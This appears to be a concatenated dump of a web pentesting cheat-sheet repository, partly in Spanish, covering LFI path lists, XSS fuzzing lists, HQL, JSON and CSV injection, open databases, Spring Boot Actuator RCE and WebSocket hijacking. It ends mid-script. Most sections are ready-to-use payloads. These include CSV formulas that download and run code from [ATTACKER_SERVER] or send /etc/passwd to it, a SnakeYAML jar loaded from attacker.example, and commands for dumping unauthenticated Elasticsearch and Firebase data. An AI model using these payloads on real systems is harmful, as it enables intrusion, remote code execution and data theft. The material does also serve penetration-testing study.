/opt/lamp/logs/error_log 23 | /proc/self/environ 24 | /proc/version 25 | /proc/cmdline 26 | /proc/mounts 27 | /proc/config.gz 28 | /root/.bashrc 29 | /root/.bash_history 30 | /root/.ssh/authorized_keys 31 | /root/.ssh/id_rsa 32 | /root/.ssh/id_rsa.keystore 33 | /root/.ssh/id_rsa.pub 34 | /root/.ssh/known_hosts 35 | /usr/local/apache/htdocs/index.html 36 | /usr/local/apache/conf/httpd.conf 37 | /usr/local/apache/conf/extra/httpd-ssl.conf 38 | /usr/local/apache/logs/error_log 39 | /usr/local/apache/logs/access_log 40 | /usr/local/apache/bin/apachectl 41 | /usr/local/apache2/htdocs/index.html 42 | /usr/local/apache2/conf/httpd.conf 43 | /usr/local/apache2/conf/extra/httpd-ssl.conf 44 | /usr/local/apache2/logs/error_log 45 | /usr/local/apache2/logs/access_log 46 | /usr/local/apache2/bin/apachectl 47 | /usr/local/etc/nginx/nginx.conf 48 | /usr/local/nginx/conf/nginx.conf 49 | /var/apache/logs/access_log 50 | /var/apache/logs/access.log 51 | /var/apache/logs/error_log 52 | /var/apache/logs/error.log 53 | /var/log/apache/access.log 54 | /var/log/apache/access_log 55 | /var/log/apache/error.log 56 | /var/log/apache/error_log 57 | /var/log/httpd/error_log 58 | /var/log/httpd/access_log 59 | /var/log/nginx/access_log 60 | /var/log/nginx/access.log 61 | /var/log/nginx/error_log 62 | /var/log/nginx/error.log -------------------------------------------------------------------------------- /Web Application/XSS Injection/Intruder/0xcela_event_handlers.txt: -------------------------------------------------------------------------------- 1 | FSCommand 2 | onAbort 3 | onActivate 4 | onAfterPrint 5 | onAfterUpdate 6 | onBeforeActivate 7 | onBeforeCopy 8 | onBeforeCut 9 | onBeforeDeactivate 10 | onBeforeEditFocus 11 | onBeforePaste 12 | onBeforePrint 13 | onBeforeUnload 14 | onBeforeUpdate 15 | onBegin 16 | onBlur 17 | onBounce 18 | onCellChange 19 | onChange 20 | onClick 21 | onContextMenu 22 | onControlSelect 23 | onCopy 24 | onCut 25 | onDataAvailable 26 | onDataSetChanged 27 | onDataSetComplete 28 | onDblClick 29 | onDeactivate 30 | onDrag 31 | onDragDrop 32 | onDragEnd 33 | onDragEnter 34 | onDragLeave 35 | onDragOver 36 | onDragStart 37 | onDrop 38 | onEnd 39 | onError 40 | onErrorUpdate 41 | onFilterChange 42 | onFinish 43 | onFocus 44 | onFocusIn 45 | onFocusOut 46 | onHashChange 47 | onHelp 48 | onInput 49 | onKeyDown 50 | onKeyPress 51 | onKeyUp 52 | onLayoutComplete 53 | onLoad 54 | onLoseCapture 55 | onMediaComplete 56 | onMediaError 57 | onMessage 58 | onMouseDown 59 | onMouseEnter 60 | onMouseLeave 61 | onMouseMove 62 | onMouseOut 63 | onMouseOver 64 | onMouseUp 65 | onMouseWheel 66 | onMove 67 | onMoveEnd 68 | onMoveStart 69 | onOffline 70 | onOnline 71 | onOutOfSync 72 | onPaste 73 | onPause 74 | onPopState 75 | onProgress 76 | onPropertyChange 77 | onReadyStateChange 78 | onRedo 79 | onRepeat 80 | onReset 81 | onResize 82 | onResizeEnd 83 | onResizeStart 84 | onResume 85 | onReverse 86 | onRowDelete 87 | onRowExit 88 | onRowInserted 89 | onRowsEnter 90 | onScroll 91 | onSeek 92 | onSelect 93 | onSelectStart 94 | onSelectionChange 95 | onStart 96 | onStop 97 | onStorage 98 | onSubmit 99 | onSyncRestored 100 | onTimeError 101 | onTrackChange 102 | onURLFlip 103 | onUndo 104 | onUnload 105 | seekSegmentTime -------------------------------------------------------------------------------- /Web Application/SQL Injection/HQL Injection.md: -------------------------------------------------------------------------------- 1 | # Hibernate Query Language Injection 2 | 3 | > Hibernate ORM (Hibernate in short) is an object-relational mapping tool for the Java programming language. It provides a framework for mapping an object-oriented domain model to a relational database. - Wikipedia 4 | ## Summary 5 | 6 | * [HQL Comments](#hql-comments) 7 | * [HQL List Columns](#hql-list-columns) 8 | * [HQL Error Based](#hql-error-based) 9 | * [References](#references) 10 | 11 | ## HQL Comments 12 | 13 | ```sql 14 | HQL does not support comments 15 | ``` 16 | 17 | ## HQL List Columns 18 | 19 | ```sql 20 | from BlogPosts 21 | where title like '%' 22 | and DOESNT_EXIST=1 and ''='%' -- 23 | and published = true 24 | ``` 25 | 26 | Using an unexisting column will an exception leaking several columns names. 27 | 28 | ```sql 29 | org.hibernate.exception.SQLGrammarException: Column "DOESNT_EXIST" not found; SQL statement: 30 | select blogposts0_.id as id21_, blogposts0_.author as author21_, blogposts0_.promoCode as promo3_21_, blogposts0_.title as title21_, blogposts0_.published as published21_ from BlogPosts blogposts0_ where blogposts0_.title like '%' or DOESNT_EXIST='%' and blogposts0_.published=1 [42122-159] 31 | ``` 32 | 33 | ## HQL Error Based 34 | 35 | ```sql 36 | from BlogPosts 37 | where title like '%11' 38 | and (select password from User where username='admin')=1 39 | or ''='%' 40 | and published = true 41 | ``` 42 | 43 | Error based on value casting. 44 | 45 | ```sql 46 | Data conversion error converting "d41d8cd98f00b204e9800998ecf8427e"; SQL statement: 47 | select blogposts0_.id as id18_, blogposts0_.author as author18_, blogposts0_.promotionCode as promotio3_18_, blogposts0_.title as title18_, blogposts0_.visible as visible18_ from BlogPosts blogposts0_ where blogposts0_.title like '%11' and (select user1_.password from User user1_ where user1_.username = 'admin')=1 or ''='%' and blogposts0_.published=1 48 | ``` 49 | 50 | :warning: **HQL does not support UNION queries** 51 | -------------------------------------------------------------------------------- /Web Application/SSL_TLS/README.md: -------------------------------------------------------------------------------- 1 | # Testing for SSL and TLS Vulnerablities 2 | 3 | ## Summary 4 | - [Tools](#tools) 5 | - [Protocol SSLv3](#protocol-sslv3) 6 | - [POODLE](#poodle) 7 | - [BEAST & CRIME](#beast-&-crime) 8 | - [LUCKY13](#lucky13) 9 | 10 | 11 | ## Tools 12 | 13 | You can use [testssl](https://github.com/drwetter/testssl.sh) for this purpose. 14 | 15 | ## Protocol SSLv3 16 | 17 | This protocol is obsolete. There are public vulnerabilities that allow an attacker to decrypt the communications between the client and the server. 18 | 19 | You can use the following command for a PoC in your report: 20 | 21 | ``` 22 | OpenSSL> s_client -ssl3 -proxy 127.0.0.1:8080 -connect <server_victim> 23 | ``` 24 | 25 | ## POODLE 26 | 27 | (CVE-2014-3566) Using SSLv3 with CBC encryption makes the server vulnerable to Man in The Middle attacks, being able to decrypt message bytes with only 256 attempts per byte (assuming the application can be forced to send the same bytes multiple times). 28 | 29 | You can use the following command for a PoC in your report: 30 | ``` 31 | OpenSSL> s_client -ssl3 -proxy 127.0.0.1:8080 -connect <server_victim> 32 | ``` 33 | 34 | ## BEAST & CRIME 35 | 36 | (CVE-2011-3389 / CVE-2012-4929): The use of TLSv1.0 with CBC encryption allows an attacker with the ability to force traffic, decrypt communications by sending messages of variable length and observing the size differences of the encrypted message. 37 | 38 | You can use the following command for a PoC in your report: 39 | ``` 40 | OpenSSL> s_client -tls1 -cipher AES128-SHA -proxy 127.0.0.1:8080 --connect <server_victim> 41 | ``` 42 | 43 | ## LUCKY13 44 | 45 | (CVE-2013-0169): The server supports CBC ciphers, which are vulnerable to padding oracle attacks based on the processing time of the message authentication algorithm (MAC) used. 46 | 47 | You can use the following command for a PoC in your report: 48 | ``` 49 | OpenSSL> s_client -cipher AES128-SHA -proxy 127.0.0.1:8080 --connect <server_victim> 50 | ``` 51 | 52 | 53 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Intruder/tagsXSS.txt: -------------------------------------------------------------------------------- 1 | a 2 | a2 3 | abbr 4 | acronym 5 | address 6 | animate 7 | animatemotion 8 | animatetransform 9 | applet 10 | area 11 | article 12 | aside 13 | audio 14 | audio2 15 | b 16 | base 17 | basefont 18 | bdi 19 | bdo 20 | bgsound 21 | big 22 | blink 23 | blockquote 24 | body 25 | br 26 | button 27 | canvas 28 | caption 29 | center 30 | cite 31 | code 32 | col 33 | colgroup 34 | command 35 | content 36 | custom tags 37 | data 38 | datalist 39 | dd 40 | del 41 | details 42 | dfn 43 | dialog 44 | dir 45 | div 46 | dl 47 | dt 48 | element 49 | em 50 | embed 51 | fieldset 52 | figcaption 53 | figure 54 | font 55 | footer 56 | form 57 | frame 58 | frameset 59 | h1 60 | head 61 | header 62 | hgroup 63 | hr 64 | html 65 | i 66 | iframe 67 | iframe2 68 | image 69 | image2 70 | image3 71 | img 72 | img2 73 | input 74 | input2 75 | input3 76 | input4 77 | ins 78 | isindex 79 | kbd 80 | keygen 81 | label 82 | legend 83 | li 84 | link 85 | listing 86 | main 87 | map 88 | mark 89 | marquee 90 | menu 91 | menuitem 92 | meta 93 | meter 94 | multicol 95 | nav 96 | nextid 97 | nobr 98 | noembed 99 | noframes 100 | noscript 101 | object 102 | ol 103 | optgroup 104 | option 105 | output 106 | p 107 | param 108 | picture 109 | plaintext 110 | pre 111 | progress 112 | q 113 | rb 114 | rp 115 | rt 116 | rtc 117 | ruby 118 | s 119 | samp 120 | script 121 | section 122 | select 123 | set 124 | shadow 125 | slot 126 | small 127 | source 128 | spacer 129 | span 130 | strike 131 | strong 132 | style 133 | sub 134 | summary 135 | sup 136 | svg 137 | table 138 | tbody 139 | td 140 | template 141 | textarea 142 | tfoot 143 | th 144 | thead 145 | time 146 | title 147 | tr 148 | track 149 | tt 150 | u 151 | ul 152 | var 153 | video 154 | video2 155 | wbr 156 | xmp -------------------------------------------------------------------------------- /Web Application/JSON Injection/README.md: -------------------------------------------------------------------------------- 1 | # JSON Injection 2 | 3 | ## Summary 4 | - [Inyección JSON del lado del Servidor](#inyeccion-json-del-lado-del-servidor) 5 | - [Bypass de Cuenta](#bypass-de-cuenta) 6 | - [Inyección JSON del lado del Cliente](#inyeccion-json-del-lado-del-cliente) 7 | - [XSS JSON](#xss-json) 8 | - [SQLi JSON](#sqli-json) 9 | - [Reference Error Fix](#reference-error-fix) 10 | - [SSTI](#ssti) 11 | 12 | *** 13 | 14 | Se pueden describir dos tipos de problemas de seguridad: 15 | 16 | ## Inyección JSON del lado del Servidor 17 | 18 | La inyección JSON del lado del servidor ocurre cuando el servidor no desinfecta los datos de una fuente que no es de confianza y los escribe directamente en un flujo JSON. 19 | 20 | ### Bypass de Cuenta 21 | ``` 22 | john%22,%22account%22:%22administrator%22 23 | ``` 24 | 25 | La cadena JSON resultante es: 26 | ``` 27 | { 28 | "account":"user", 29 | "user":"john", 30 | "account":"administrator", 31 | "pass":"password" 32 | } 33 | ``` 34 | 35 | *** 36 | 37 | ## Inyección JSON del lado del Cliente 38 | 39 | La inyección JSON del lado del cliente ocurre cuando los datos de una fuente JSON que no es de confianza no se desinfectan y analizan directamente con la función "eval" de JavaScript . 40 | 41 | ### XSS JSON 42 | 43 | Note los valores `user` y `account`, deberían ser los propios del escenario que está analizando. 44 | ``` 45 | user"});alert(document.cookie);({"account":"user 46 | ``` 47 | ``` 48 | 1\'/[location=`Javas\x63ript:\x63onfirm\x60K\x60`]// 49 | ``` 50 | 51 | ### SQLi JSON 52 | ``` 53 | {"user_id": "5755 and sleep(12)=1", "receiver": "yourmail@mymail"} 54 | ``` 55 | ``` 56 | {"param":"1')))+MySQL_payload--+-"} 57 | ``` 58 | 59 | ### Reference Error Fix 60 | 61 | Úselo para corregir la sintaxis de algunos códigos javascript. 62 | 63 | Compruebe la pestaña de la consola en las herramientas de desarrollo del navegador (F12) para el error de referencia respectivo (`ReferenceError`) y reemplace `var` y `myFunc` en consecuencia: 64 | ``` 65 | ';alert(1);var myObj=' 66 | ';alert(1);function myFunc(){}' 67 | ``` 68 | 69 | ### SSTI 70 | ``` 71 | ${alert(1)}<svg onload=eval('`//'+URL)> 72 | ``` 73 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Intruder/attributesXSS.txt: -------------------------------------------------------------------------------- 1 | onactivate 2 | onafterprint 3 | onafterscriptexecute 4 | onanimationcancel 5 | onanimationend 6 | onanimationiteration 7 | onanimationstart 8 | onauxclick 9 | onbeforeactivate 10 | onbeforecopy 11 | onbeforecut 12 | onbeforedeactivate 13 | onbeforepaste 14 | onbeforeprint 15 | onbeforescriptexecute 16 | onbeforeunload 17 | onbegin 18 | onblur 19 | onbounce 20 | oncanplay 21 | oncanplaythrough 22 | onchange 23 | onclick 24 | onclose 25 | oncontextmenu 26 | oncopy 27 | oncuechange 28 | oncut 29 | ondblclick 30 | ondeactivate 31 | ondrag 32 | ondragend 33 | ondragenter 34 | ondragleave 35 | ondragover 36 | ondragstart 37 | ondrop 38 | ondurationchange 39 | onend 40 | onended 41 | onerror 42 | onfinish 43 | onfocus 44 | onfocusin 45 | onfocusout 46 | onfullscreenchange 47 | onhashchange 48 | oninput 49 | oninvalid 50 | onkeydown 51 | onkeypress 52 | onkeyup 53 | onload 54 | onloadeddata 55 | onloadedmetadata 56 | onloadend 57 | onloadstart 58 | onmessage 59 | onmousedown 60 | onmouseenter 61 | onmouseleave 62 | onmousemove 63 | onmouseout 64 | onmouseover 65 | onmouseup 66 | onmousewheel 67 | onmozfullscreenchange 68 | onpagehide 69 | onpageshow 70 | onpaste 71 | onpause 72 | onplay 73 | onplaying 74 | onpointerdown 75 | onpointerenter 76 | onpointerleave 77 | onpointermove 78 | onpointerout 79 | onpointerover 80 | onpointerrawupdate 81 | onpointerup 82 | onpopstate 83 | onprogress 84 | onreadystatechange 85 | onrepeat 86 | onreset 87 | onresize 88 | onscroll 89 | onsearch 90 | onseeked 91 | onseeking 92 | onselect 93 | onselectionchange 94 | onselectstart 95 | onshow 96 | onstart 97 | onsubmit 98 | ontimeupdate 99 | ontoggle 100 | ontouchend 101 | ontouchmove 102 | ontouchstart 103 | ontransitioncancel 104 | ontransitionend 105 | ontransitionrun 106 | ontransitionstart 107 | onunhandledrejection 108 | onunload 109 | onvolumechange 110 | onwaiting 111 | onwebkitanimationend 112 | onwebkitanimationiteration 113 | onwebkitanimationstart 114 | onwebkittransitionend 115 | onwheel -------------------------------------------------------------------------------- /Web Application/CSV Injection/README.md: -------------------------------------------------------------------------------- 1 | # CSV Injection (Formula Injection) 2 | 3 | Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel, Libre Office or Open Office. When a web application does not properly validate the contents of the CSV file, it could lead to contents of a cell or many cells being executed. 4 | 5 | Basic exploit with Dynamic Data Exchange (Linux and Windows) 6 | 7 | ## Pop passwd file (Linux) 8 | ``` 9 | ='file:///etc/passwd'#$passwd.A1 10 | ``` 11 | 12 | ## Pop a reverseShell (Linux) 13 | ``` 14 | =WEBSERVICE(CONCATENATE("http://[ATTACKER_SERVER]:[PORT]/",('file:///etc/passwd'#$passwd.A1))) 15 | ``` 16 | 17 | ## Pop a calc (Windows) 18 | ``` 19 | DDE ("cmd";"/C calc";"!A0")A0 20 | @SUM(1+1)*cmd|' /C calc'!A0 21 | =2+5+cmd|' /C calc'!A0 22 | ``` 23 | 24 | ## Pop a notepad (Windows) 25 | ``` 26 | =cmd|' /C notepad'!'A1' 27 | ``` 28 | 29 | ## Powershell download and execute (Windows) 30 | ``` 31 | =cmd|'/C powershell IEX(wget [ATTACKER_SERVER]/shell.exe)'!A0 32 | ``` 33 | 34 | ## Msf smb delivery with rundll32 (Windows) 35 | ``` 36 | =cmd|'/c rundll32.exe \\[ATTACKER_SERVER]\3\2\1.dll,0'!_xlbgnm.A1 37 | ``` 38 | 39 | ## Prefix obfuscation and command chaining (Windows) 40 | ``` 41 | =AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A 42 | =cmd|'/c calc.exe'!A*cmd|'/c calc.exe'!A 43 | +thespanishinquisition(cmd|'/c calc.exe'!A 44 | = cmd|'/c calc.exe'!A 45 | ``` 46 | 47 | ## Using rundll32 instead of cmd (Windows) 48 | ``` 49 | =rundll32|'URL.dll,OpenURL calc.exe'!A 50 | =rundll321234567890abcdefghijklmnopqrstuvwxyz|'URL.dll,OpenURL calc.exe'!A 51 | 52 | # Using null characters to bypass dictionary filters. Since they are not spaces, they are ignored when executed. (Windows) 53 | = C m D | '/ c c al c . e x e ' ! A 54 | ``` 55 | 56 | Technical Details of the above payload: 57 | 58 | - `cmd` is the name the server can respond to whenever a client is trying to access the server 59 | - `/C` calc is the file name which in our case is the calc(i.e the calc.exe) 60 | - `!A0` is the item name that specifies unit of data that a server can respond when the client is requesting the data 61 | 62 | Any formula can be started with 63 | 64 | ``` 65 | = 66 | + 67 | – 68 | @ 69 | ``` 70 | -------------------------------------------------------------------------------- /Web Application/Information Disclosure/README.md: -------------------------------------------------------------------------------- 1 | # Information Disclosure 2 | 3 | La divulgación de información, también conocida como fuga de información, es cuando un sitio web revela involuntariamente información confidencial a sus usuarios. 4 | 5 | *** 6 | 7 | ## Summary 8 | 9 | * [Archivos para Rastreadores Web](#archivos-para-rastreadores-web) 10 | * [Herramientas de Burpsuite](#herramientas-de-burpsuite) 11 | * [Source Code Disclosure via Backup Files](#source-code-disclosure-via-backup-files) 12 | * [Métodos HTTP](#trace-http) 13 | * [Change "Accept" Header](#change-accept-header) 14 | 15 | *** 16 | 17 | ## Archivos para Rastreadores Web 18 | 19 | ``` 20 | /robots.txt 21 | /sitemap.xml 22 | ``` 23 | 24 | *** 25 | 26 | ## Herramientas de Burpsuite 27 | 28 | "Target --> SiteMap --> Engagement Tools" 29 | 30 | *** 31 | 32 | ## Source Code Disclosure via Backup Files 33 | 34 | Cuando un servidor maneja archivos con una extensión en particular ".php", normalmente ejecutará el código, en lugar de simplemente enviarlo al cliente como texto. Sin embargo, en algunas situaciones, puede engañar a un sitio web para que devuelva el contenido del archivo. 35 | 36 | ``` 37 | /private.php --> 200 OK (no devuelve nada, solo ejecuta) 38 | /private.php~ --> 200 OK (devuelve el fichero, ya que se está llamando al archivo temporal) 39 | ``` 40 | 41 | *** 42 | 43 | ## Métodos HTTP 44 | 45 | ### TRACE 46 | 47 | TRACE: Repite la solicitud entrante. 48 | 49 | Es posible obtener información de encabezados sensibles con el método TRACE. 50 | 51 | ``` 52 | POST /admin --> 401 Unauthorized 53 | TRACE /admin --> 200 OK 54 | ``` 55 | 56 | Esta última request devuelve un header oculto: 57 | 58 | ``` 59 | X-Custom-IP-Authorization: 181.61.60.225 60 | ``` 61 | 62 | Luego, agregar este header a cada solicitud que se envíe como: 63 | 64 | ``` 65 | X-Custom-IP-Authorization: 127.0.0.1 66 | ``` 67 | 68 | Y se accede como usuario Administrator. 69 | 70 | ### Otros Métodos para Generar Errores 71 | 72 | ``` 73 | HEAD (Solicita la lectura del encabezado de una página Web) 74 | OPTION (Consulta ciertas opciones) 75 | POST 76 | GET 77 | PUT (Solicita el almacenamiento de una página Web) 78 | HELP 79 | DELETE (Elimina la página Web) 80 | CONNECT (Reservado para uso futuro) 81 | ``` 82 | 83 | *** 84 | 85 | ## Change "Accept" Header 86 | 87 | Find information disclosure vulnerabilities in some web servers by changing the "Accept" header. 88 | 89 | `Accept: application/json, text/javascript, */*; q=0.01` 90 | 91 | *** 92 | -------------------------------------------------------------------------------- /Web Application/DataBases/README.md: -------------------------------------------------------------------------------- 1 | ## Summary 2 | 3 | * [Firebase](#firebase) 4 | * [Elastic Search DB](#elastic-search-db) 5 | * [Mongo DB](#mongo-db) 6 | * [Couch DB](#couch-db) 7 | * [Cassandra DB](#cassandra-db) 8 | 9 | ## Firebase: 10 | 11 | ### Validar que exista una DB: 12 | 13 | ``` 14 | https://domain-victim.firebaseio.com/ 15 | http://domain-victim.firebaseio.com/ 16 | ``` 17 | 18 | ### Ver la DB: 19 | 20 | ``` 21 | https://domain-victim.firebaseio.com/.json 22 | https://domain-victim.firebaseio.com/.json~ 23 | http://domain-victim.firebaseio.com/.json 24 | ``` 25 | 26 | ## Elastic Search DB: 27 | 28 | Siempre revisar el puerto 9200. 29 | 30 | Por defecto, Elastic Search DB no posee autenticación, lo que lo convierte en un posible vector de ataque. 31 | 32 | ### Shodan Dork 33 | 34 | ``` 35 | port:"9200" elastic (Shodan) 36 | ``` 37 | 38 | ### Buscar todos los Indexes (DBs) que están disponibles vía GET: 39 | 40 | ``` 41 | http://victim:9200/_cat/indices?v 42 | ``` 43 | ``` 44 | http://victim:9200/_stats/?pretty=1 45 | ``` 46 | 47 | ### Para buscar una palabra en concreto: 48 | 49 | ``` 50 | http://victim:9200/_all/_search?q=email 51 | ``` 52 | 53 | Una buena lista de palabras a buscar es: 54 | 55 | ``` 56 | Username 57 | Email 58 | Password 59 | Token 60 | Secret 61 | Key 62 | ``` 63 | 64 | Si quiere buscar en un Index específico, reemplace "_all" por el Index que desee. 65 | 66 | ### Listar todo el contenido de un Index en concreto vía GET: 67 | 68 | ``` 69 | http://victim:9200/[index_here]/_mapping?pretty=1 70 | ``` 71 | 72 | ### Consultar todos los valores que contiene un nombre de parámetro específico: 73 | 74 | ``` 75 | http://victim:9200/_all/_search?q=_exists:email&pretty=1 76 | ``` 77 | 78 | Esto devolverá documentos que contienen un campo llamado 'email'. 79 | 80 | ## Mongo DB: 81 | 82 | Siempre revisar el puerto 27017. 83 | 84 | Por defecto, MongoDB no posee autenticación, lo que lo convierte en un posible vector de ataque. 85 | 86 | ### Conectar a la instancia de MongoDB con el cliente de Mongo: 87 | 88 | ``` 89 | mongo [vulnerable_ip] 90 | ``` 91 | 92 | Una vez conectado, utilice algún comando y si obtiene la respuesta "Unauthorized" quiere decir que el login está habilitado. 93 | 94 | ``` 95 | db.adminCommand( { listDatabases: 1 } ) 96 | ``` 97 | 98 | <img src="https://user-images.githubusercontent.com/43796175/118989240-7d3e8d00-b947-11eb-8115-62750b41f0c8.jpg"> 99 | 100 | ## Couch DB: 101 | 102 | Ver los puertos: 103 | ``` 104 | port:5985 105 | port:6984 106 | ``` 107 | 108 | ## Cassandra DB: 109 | 110 | Ver los puertos: 111 | ``` 112 | port:9042 113 | port:9160 114 | ``` 115 | -------------------------------------------------------------------------------- /Web Application/Insecure Deserialization/README.md: -------------------------------------------------------------------------------- 1 | # Insecure Deserialization 2 | 3 | La serialización es el proceso de convertir estructuras de datos complejas, como objetos y sus campos, en un formato "más plano" que se puede enviar y recibir como un flujo secuencial de bytes. 4 | 5 | La deserialización es el proceso de restaurar este flujo de bytes a una réplica completamente funcional del objeto original, en el estado exacto en que se serializó. 6 | 7 | ## Summary 8 | 9 | * [Java deserialization : ysoserial, ...](JAVA.md) 10 | * [PHP (Object injection) : phpggc, ...](PHP.md) 11 | * [Ruby : universal rce gadget, ...](Ruby.md) 12 | * [Python : pickle, ...](Python.md) 13 | 14 | ## References 15 | 16 | * [Github - ysoserial](https://github.com/frohoff/ysoserial) 17 | * [Github - ysoserial.net](https://github.com/pwntester/ysoserial.net) 18 | * [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md) 19 | * [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/) 20 | * [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a) 21 | * [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - 14 Aug 2017, Peter Stöckli](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html) 22 | * [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection) 23 | * [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/) 24 | * [PHP unserialize](http://php.net/manual/en/function.unserialize.php) 25 | * [PHP Generic Gadget - ambionics security](https://www.ambionics.io/blog/php-generic-gadget-chains) 26 | * [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/) 27 | * [Java Deserialization in manager.paypal.com](http://artsploit.blogspot.hk/2016/01/paypal-rce.html) by Michael Stepankin 28 | * [Instagram's Million Dollar Bug](http://www.exfiltrated.com/research-Instagram-RCE.php) by Wesley Wineberg 29 | * [(Ruby Cookie Deserialization RCE on facebooksearch.algolia.com](https://hackerone.com/reports/134321) by Michiel Prins (michiel) 30 | * [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals 31 | * [Diving into unserialize() - Sep 19- Vickie Li](https://medium.com/swlh/diving-into-unserialize-3586c1ec97e) 32 | * [.NET Gadgets](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf) by Alvaro Muñoz (@pwntester) & OleksandrMirosh 33 | -------------------------------------------------------------------------------- /Web Application/Spring Boot/README.md: -------------------------------------------------------------------------------- 1 | # Springboot-Actuator 2 | 3 | Actuator endpoints let you monitor and interact with your application. 4 | 5 | Spring Boot includes a number of built-in endpoints and lets you add your own. 6 | 7 | For example, the `/health` endpoint provides basic application health information. 8 | 9 | Some of them contains sensitive info such as: 10 | 11 | - `/trace` - Displays trace information (by default the last 100 HTTP requests with headers). 12 | - `/env` - Displays the current environment properties (from Spring’s ConfigurableEnvironment). 13 | - `/heapdump` - Builds and returns a heap dump from the JVM used by our application. 14 | - `/dump` - Displays a dump of threads (including a stack trace). 15 | - `/logfile` - Outputs the contents of the log file. 16 | - `/mappings` - Shows all of the MVC controller mappings. 17 | 18 | These endpoints are enabled by default in Springboot 1.X. 19 | 20 | Note: Sensitive endpoints will require a username/password when they are accessed over HTTP. 21 | 22 | Since Springboot 2.X only `/health` and `/info` are enabled by default. 23 | 24 | ## Remote Code Execution via `/env` 25 | 26 | Spring puede cargar configuraciones externas en formato YAML. 27 | 28 | La configuración de YAML se analiza con la biblioteca SnakeYAML, que es susceptible a ataques de deserialización. 29 | 30 | En otras palabras, un atacante puede obtener RCE cargando un archivo de configuración malicioso. 31 | 32 | ### Steps 33 | 34 | 1. Generate a payload of SnakeYAML deserialization gadget. 35 | 36 | - Build malicious jar 37 | 38 | ```bash 39 | git clone https://github.com/artsploit/yaml-payload.git 40 | cd yaml-payload 41 | # Edit the payload before executing the last commands (see below) 42 | javac src/artsploit/AwesomeScriptEngineFactory.java 43 | jar -cvf yaml-payload.jar -C src/ . 44 | ``` 45 | 46 | - Edit src/artsploit/AwesomeScriptEngineFactory.java 47 | 48 | ```java 49 | public AwesomeScriptEngineFactory() { 50 | try { 51 | Runtime.getRuntime().exec("ping rce.poc.attacker.example"); // COMMAND HERE 52 | } catch (IOException e) { 53 | e.printStackTrace(); 54 | } 55 | } 56 | ``` 57 | 58 | - Create a malicious yaml config (yaml-payload.yml) 59 | 60 | ```yaml 61 | !!javax.script.ScriptEngineManager [ 62 | !!java.net.URLClassLoader [[ 63 | !!java.net.URL ["http://attacker.example/yaml-payload.jar"] 64 | ]] 65 | ] 66 | ``` 67 | 68 | 69 | 2. Host the malicious files on your server. 70 | 71 | - yaml-payload.jar 72 | - yaml-payload.yml 73 | 74 | 75 | 3. Change `spring.cloud.bootstrap.location` to your server. 76 | 77 | ``` 78 | POST /env HTTP/1.1 79 | Host: victim.example:8090 80 | Content-Type: application/x-www-form-urlencoded 81 | Content-Length: 59 82 | 83 | spring.cloud.bootstrap.location=http://attacker.example/yaml-payload.yml 84 | ``` 85 | 86 | 4. Reload the configuration. 87 | 88 | ``` 89 | POST /refresh HTTP/1.1 90 | Host: victim.example:8090 91 | Content-Type: application/x-www-form-urlencoded 92 | Content-Length: 0 93 | ``` 94 | -------------------------------------------------------------------------------- /Web Application/Web Sockets/README.md: -------------------------------------------------------------------------------- 1 | # Web Sockets 2 | 3 | The WebSocket protocol allows a bidirectional and full-duplex communication 4 | 5 | WebSockets are a bi-directional, full duplex communications protocol initiated over HTTP between a client and a server. They are commonly used in modern web applications for streaming data and other asynchronous traffic. 6 | 7 | WebSocket connections are normally created using client-side JavaScript like the following: 8 | 9 | ``` 10 | var ws = new WebSocket("wss://normal-website.com/chat"); 11 | ``` 12 | 13 | To establish the connection, the browser and server perform a WebSocket handshake over HTTP. The browser issues a WebSocket handshake request like the following: 14 | 15 | ``` 16 | GET /chat HTTP/1.1 17 | Host: normal-website.com 18 | Sec-WebSocket-Version: 13 19 | Sec-WebSocket-Key: wDqumtseNBJdhkihL6PW7w== 20 | Connection: keep-alive, Upgrade 21 | Cookie: session=KOsEJNuflw4Rd9BDNrVmvwBF9rEijeE2 22 | Upgrade: websocket 23 | ``` 24 | 25 | If the server accepts the connection, it returns a WebSocket handshake response like the following: 26 | 27 | ``` 28 | HTTP/1.1 101 Switching Protocols 29 | Connection: Upgrade 30 | Upgrade: websocket 31 | Sec-WebSocket-Accept: 0FFP+2nmNIf/h+4BP36k9uzrYGk= 32 | ``` 33 | 34 | Several features of the WebSocket handshake messages are worth noting: 35 | 36 | - The Connection and upgrade headers in the request and response indicate that this is a WebSocket handshake. 37 | - The `Sec-WebSocket-Version` request header specifies the WebSocket protocol version that the client wishes to use. This is typically 13. 38 | - The `Sec-WebSocket-Key` request header contains a base64-encoded random value, which should be randomly generated in each handshake request. 39 | - The `Sec-WebSocket-Accept` response header contains a hash of the value submitted in the `Sec-WebSocket-Key` request header, concatenated with a specific string defined in the protocol specification. This is done to prevent misleading responses resulting from misconfigured servers or caching proxies. 40 | 41 | ## Secuestro de WebSocket entre sitios (CSWSH) 42 | 43 | Si el protocolo de enlace de WebSocket no está protegido correctamente mediante un token CSRF o un `nonce`, es posible utilizar el WebSocket autenticado de un usuario en el sitio controlado por un atacante porque el navegador envía automáticamente las cookies. Este ataque se denomina Secuestro de WebSocket entre sitios (CSWSH). 44 | 45 | Ejemplo de explotación, alojada en el servidor de un atacante, que filtra los datos recibidos del WebSocket al atacante: 46 | 47 | ``` 48 | <script> 49 | ws = new WebSocket('wss://vulnerable.example.com/messages'); 50 | ws.onopen = function start(event) { 